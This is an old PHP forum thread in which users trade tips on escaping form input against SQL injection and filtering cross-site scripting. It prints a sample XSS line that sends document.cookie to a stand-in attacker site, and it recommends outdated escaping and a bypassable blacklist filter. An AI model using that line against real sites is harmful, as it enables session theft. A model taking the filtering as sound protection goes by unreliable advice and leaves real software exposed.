Security PHP & Forms

[Mutley]

Is there any tips you can give about securing PHP and forms? I think with forms it is possible at times to do SQL injections, how can you prevent this and stop abuse with forms?

Maybe restrict characters used, I would like to know how to secure the scripts I create.

[Daniel0]

mysql_real_escape_string would prevent SQL injection. Another thing you need to be vary about is XSS (cross-site scripting) attacks.

[Mutley]

I just looked up mysql_real_escape_string in the PHP manual, so I can just use it among my variables within form fields. Looks easy and useful, I guess it disables certain characters or character combinations to be used.

Not heard of XSS, is it common?

[Orio]

[quote author=Mutley link=topic=110976.msg449407#msg449407 date=1160417975]
I just looked up mysql_real_escape_string in the PHP manual, so I can just use it among my variables within form fields. Looks easy and useful, I guess it disables certain characters or character combinations to be used.[/quote]


More or less yes :)
But you need to make sure that magic_quotes is turned off, because then the string will be escaped twice. And because mysql_real_escape_string() has a better effect compared to magic_quotes, it's important to use strip_slashes() before escaping (if magic_quotes is on).
I use this function to escape my strings:

[code]<?php

function sql_quote($value)
{

if(get_magic_quotes_gpc())
   $value = stripslashes($value);

if(function_exists("mysql_real_escape_string"))
   $value = mysql_real_escape_string($value);
else
   $value = addslashes($value);

return $value;
}

?>[/code]

Orio.

[Daniel0]

[quote author=Mutley link=topic=110976.msg449407#msg449407 date=1160417975]
Not heard of XSS, is it common?
[/quote]

Yeah, It's beginning to get quite common, it works like this:
1. User gets redirected to hackers page. Could be like this (javascript): [code]location.href='http://evil-hackers-site.com/harvest_cookies.php?data='+document.cookie;[/code]
2. The page harvests the cookie information
3. The user is redirected back the original page.

Here are some information about XSS:
http://ha.ckers.org/xss.html
http://en.wikipedia.org/wiki/Cross_site_scripting

[pedrobcabral]

Is that also prevented with the command spoken above?
If the website does not use cookies then it is inpossible to gether information from the user that goes toward the site, right?

Isn't the stripslashes enough?
Sorry if I got it wrong,

[Daniel0]

[quote author=pedrobcabral link=topic=110976.msg449433#msg449433 date=1160419559]
Is that also prevented with the command spoken above?
[/quote]

No. For that you would have to do something like this: [code]$t = html_entity_decode($t,ENT_QUOTES);
$t = str_replace("<","&#60;",$t);
$t = str_replace(">","&#62;",$t);
$t = str_replace("&quot;",htmlspecialchars('"'),$t);
$t = preg_replace("/&#0*([0-9]*);?/",'&#\\1;',$t);
$t = str_replace('&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;','javascript:',$t);
$t = preg_replace("/javascript:/i","nojava"/*&#97;v&#97;*/."script:",$t);
$t = preg_replace("/vbscript:/i","novb"/*&#98;*/."script:",$t);[/code]

More info on XSS prevention: http://blog.bitflux.ch/wiki/XSS_Prevention

[tomfmason]

[quote author=Daniel0 link=topic=110976.msg449426#msg449426 date=1160418859]
[quote author=Mutley link=topic=110976.msg449407#msg449407 date=1160417975]
Not heard of XSS, is it common?
[/quote]

Yeah, It's beginning to get quite common, it works like this:
1. User gets redirected to hackers page. Could be like this (javascript): [code]location.href='http://evil-hackers-site.com/harvest_cookies.php?data='+document.cookie;[/code]
2. The page harvests the cookie information
3. The user is redirected back the original page.

Here are some information about XSS:
http://ha.ckers.org/xss.html
http://en.wikipedia.org/wiki/Cross_site_scripting
[/quote]

Very nice Daniel0..

Here is a atricle from Developer Fusion on [url=http://www.developerfusion.co.uk/show/4656/]sql insertion[/url].

Good luck,
Tom